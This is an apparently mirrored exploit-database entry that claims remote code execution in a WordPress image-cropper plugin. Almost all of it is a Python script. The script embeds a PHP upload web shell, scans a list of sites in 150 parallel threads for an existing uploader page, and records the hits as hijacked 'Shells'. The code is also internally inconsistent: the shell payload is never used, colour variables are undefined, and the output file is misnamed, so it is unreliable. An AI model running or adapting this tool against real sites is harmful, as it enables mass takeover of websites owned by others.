1
[webapps] Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
source link: https://www.exploit-db.com/exploits/51998
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}
try:
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
def URLdomain(site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site
def FourHundredThree(url):
try:
url = 'http://' + URLdomain(url)
check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,timeout=15)
if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
else:
url = 'https://' + URLdomain(url)
check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,verify=False ,timeout=15)
if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
except :
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
print '\n [!] {}Saved in LOL.txt'.format(fc)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK